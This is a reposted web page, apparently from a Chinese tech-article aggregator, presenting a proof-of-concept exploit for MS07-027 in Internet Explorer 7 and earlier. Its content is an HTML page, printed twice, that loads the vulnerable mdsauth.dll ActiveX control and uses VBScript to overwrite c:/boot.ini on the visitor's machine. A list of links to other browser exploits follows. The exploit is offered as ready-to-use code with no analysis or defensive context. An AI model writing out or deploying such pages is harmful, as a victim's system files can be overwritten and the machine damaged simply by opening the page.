MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)
2007-05-13 21:30
447 查看
CODE:
<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">
</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://www.514.es"
target.SaveAs "c:/boot.ini"
</script>
</body>
</html>
<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">
</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://www.514.es"
target.SaveAs "c:/boot.ini"
</script>
</body>
</html>
相关文章推荐
- Zero Day MS Internet Explorer Remote "CreateTextRange()" Code Execution
- MS Internet Explorer Recordset Double Free Memory Exploit (MS07-009)
- MS Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit
- MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit
- Nuke ET < = 3.4 (fckeditor) Remote Arbitrary File Upload Exploit
- [漏洞分析] WordPress History Collection <=1.1.1 Arbitrary File Download
- MS Internet Explorer Recordset Double Free Memory Exploit (MS07-009)
- JSP引入文件的两种方式:<jsp:include page=”file.jsp” />和<%@ include file=”file.jsp”%>
- 高德地图#import <MAMapKit/MAMapKit.h> file not found的报错解决办法
- Seam <s:fileUpload>标签的用法
- <input type="file" />浏览时只显示指定文件类型
- Microsoft Internet Explorer (mshtml.dll) - Remote Code Execution
- <input type="file" />accept属性列表
- PathFileExists用法--使用#include <shlwapi.h>
- File "scripts/rule_bison.py", line 75, in <module>
- 关于jsp中<input type="file">获取路径问文件名,获取完全路径问题
- #i nclude<file.h> 与 #i nclude "file.h"的区别?
- 关于JSP中单击任意标签弹出文件选择框(<input type="file"/>)的实现方法
- 对文件列表List<File>按名称排序
- <BEA-141281> <unable to get file lock, will retry ...> --reference